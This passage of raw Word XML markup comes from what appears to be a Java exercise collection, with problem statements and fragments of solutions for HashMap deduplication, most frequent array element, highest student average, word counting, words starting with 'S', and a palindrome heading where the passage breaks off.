          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00550E5B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00365265" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00550E5B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>emove the duplicate values from HashMap and return the max key from the HashMap.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="353"/>
    </w:p>
    <w:p w14:paraId="1E991EA6" w14:textId="63FE725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DBE164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6886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moveDuplicatesAndFindMax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6922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23053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move duplicate values and return the maximum key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128CF23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3507E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Remove duplicate values using a new map</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417C7C7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niqueValues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FC085E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7DDB51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the original map</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7A6E0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DC07D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value is not already in the new map, add it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2225A24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ED86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250CF1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269AB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A897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48876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Find the key with the maximum value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157F525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50857D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2C19AD8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0234B9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18C6F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6A29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17E93E8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6A114EB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56B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F5BBE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36B8A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key corresponding to the maximum value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0756C4C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88FB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3D3B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HashMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030DC76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A7375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031A0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2609DD4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7AAD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68B17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CC85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4FA98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HashMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2738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DAB55C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410794E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5AE75BC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8B975B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E557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247885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D458C3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HashMap:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2021702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3DD75A8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B9FF1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duplicates and get the maximum key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7CA2D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2B812CB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ith the maximum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p>
    <w:p w14:paraId="159D2AF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5C84F4" w14:textId="70AF5F15" w:rsidR="00550E5B" w:rsidRPr="00CE4B95"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BCA09D" w14:textId="77777777" w:rsidR="00550E5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00550E5B" w:rsidP="00550E5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3155544B" w14:textId="53CC8E48" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925" w:rsidP="00904D46">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="354" w:name="_Toc197867568"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00904D46" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="005B473E" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00904D46" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>eturn the maximum occurrence element from the array?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="354"/>
    </w:p>
    <w:p w14:paraId="5AFDF208" w14:textId="77777777" w:rsidR="001576F0" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925" w:rsidP="001576F0">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="001576F0" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a program to return the maximum occurrence element from the array?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3AFC5D" w14:textId="0AE38353" w:rsidR="001576F0" w:rsidRPr="00CE4B95" w:rsidRDefault="001576F0" w:rsidP="001576F0">
      <w:pPr>
        <w:ind w:left="1800" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Input: int[] arr = {1,5,3,5,6,5};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318F95B1" w14:textId="5531AE90" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="001576F0" w:rsidP="001576F0">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Output: 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6E75F9" w14:textId="6887E3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DA6EF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82C6E7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63799"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DFD22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8E1FD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turn the maximum occurrence element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0467AC9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549C2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00F8789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735FCB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D2CA82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 in the array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453B19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7250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5344E5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AD4BE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46760D"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riables to track the element with the maximum frequency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532B97F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A72480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43330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0A5E2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map to find the element with the highest frequency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C9DAC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9CB8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8A0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6F8164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367BEB2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F8071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4B66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45637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E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element with the highest frequency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460641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946C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CA0E7"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56D5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1750C85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1122D01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F956F9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nd the element with the maximum occurrence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E8173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Occurrence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3CCFFEA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26882A4"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4E6895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 with the maximum occurre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OccurrenceElement</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D45241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DB28D7" w14:textId="53F0941D"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30B8C1E" w14:textId="77777777" w:rsidR="00C83701" w:rsidRPr="00CE4B95" w:rsidRDefault="00C83701" w:rsidP="00C83701">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F91796A" w14:textId="3A6800FF" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="355" w:name="_Toc197867569"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00291AD3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Find Highest average score of student</w:t>
      </w:r>
      <w:bookmarkEnd w:id="355"/>
    </w:p>
    <w:p w14:paraId="73A31FF6" w14:textId="77777777" w:rsidR="00080B3A" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925" w:rsidP="00080B3A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Problem Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00080B3A" w:rsidRPr="00CE4B95">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CE4B95" w:rsidRDefault="00080B3A" w:rsidP="00080B3A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Your task is to write a Java function that calculates the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>highest average score</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>floor value</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the average (i.e., round down to the nearest integer). If the input list is empty, return 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601EE812"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20382D2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olutio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6292F4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5075EC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lengt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56CCDE8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C81A4C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student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gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649B47E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34231C9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1: Populate the map with scores per student</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420C063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256A15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3078D6D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arse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26D67AC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D2FFBA2"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IfAbse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p>
    <w:p w14:paraId="04D52E3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core</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015A24C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A41E6B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D3D076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IN_VALUE</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395292E0"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2FD970A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2: Calculate averages and track the max</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C3388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ntry</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S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35CF4B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mark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Value</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1025614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12D01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DC5EBA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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CED613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9B68F9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lo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dou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p>
    <w:p w14:paraId="1BB0226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verage</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F255F6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7C9C7E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307192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MIN_VALU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estAverage</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025CA90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7CD9D2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6611D32E"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ptional main method for testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DF748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B868A0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npu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36A1BB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Bobb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87"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B607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100"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5A339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ri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64"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617AC9D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22"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9DA1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0591D9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7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D121A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7E51E5" w14:textId="66BCA4AC"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666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D2CE06" w14:textId="51E70D64" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="356" w:name="_Toc197867570"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00D10C97" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Find occurrence of </w:t>
      </w:r>
      <w:r w:rsidR="00C076A8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="00D10C97" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ord in String</w:t>
      </w:r>
      <w:bookmarkEnd w:id="356"/>
    </w:p>
    <w:p w14:paraId="4036B4E4" w14:textId="045230C8" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925" w:rsidP="005F1B4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168E" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a program to return the number of occurrences for a given word in the string.</w:t>
      </w:r>
      <w:r w:rsidR="00D10C97" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E8168E" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Accept the inputs from the user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC65A36" w14:textId="7BF8B7A2"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326F1C0"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68152E4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0F9E8B8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C8DEB"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Occurrence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BD473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61D07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723A5"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176F568C"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7F80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input string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD2DCBD"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string: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466B215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16EAE8E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61879"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the word to search for</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1815AE0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word to find: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C214B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3AA27A7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40FEF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plit input string into words</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068264D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536319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1BC58B4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047CDE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5FD94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count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091FBEA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ToFi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p>
    <w:p w14:paraId="21E2E80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EC7E6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ccurrence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3BA2D2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B4C11" w14:textId="3DC582BD"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BB513D5" w14:textId="77777777" w:rsidR="00704FF1" w:rsidRPr="00CE4B95" w:rsidRDefault="00704FF1" w:rsidP="00704FF1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FE82172" w14:textId="3C3EF7F2" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="357" w:name="_Toc197867571"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="0098350E" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Find the Words which starts with ‘S’</w:t>
      </w:r>
      <w:r w:rsidR="008B1FBB" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> from List of Words</w:t>
      </w:r>
      <w:bookmarkEnd w:id="357"/>
    </w:p>
    <w:p w14:paraId="442BDEA2" w14:textId="3F2F1B6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2942A6"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46EEA60F"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65596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sStartingWith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48B7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7C23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B21A89"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tn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hindr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su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un"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB0C4D8"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7CA07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ords starting with 'S':"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37248A70"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FDFADA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p>
    <w:p w14:paraId="1316882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2725D37"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D57A5F" w14:textId="7C5EFE2F"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B3D8DBD" w14:textId="77777777" w:rsidR="006B46E6" w:rsidRPr="00CE4B95" w:rsidRDefault="006B46E6" w:rsidP="006B46E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="499D366F" w14:textId="39D430CC" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="358" w:name="_Toc197867572"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Program –</w:t>
      </w:r>
      <w:r w:rsidR="00F954C6" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Palindrome Number</w:t>
      </w:r>
      <w:bookmarkEnd w:id="358"/>
    </w:p>
    <w:p w14:paraId="2F3E1166" w14:textId="74D4F888" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925" w:rsidP="00DF111B">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
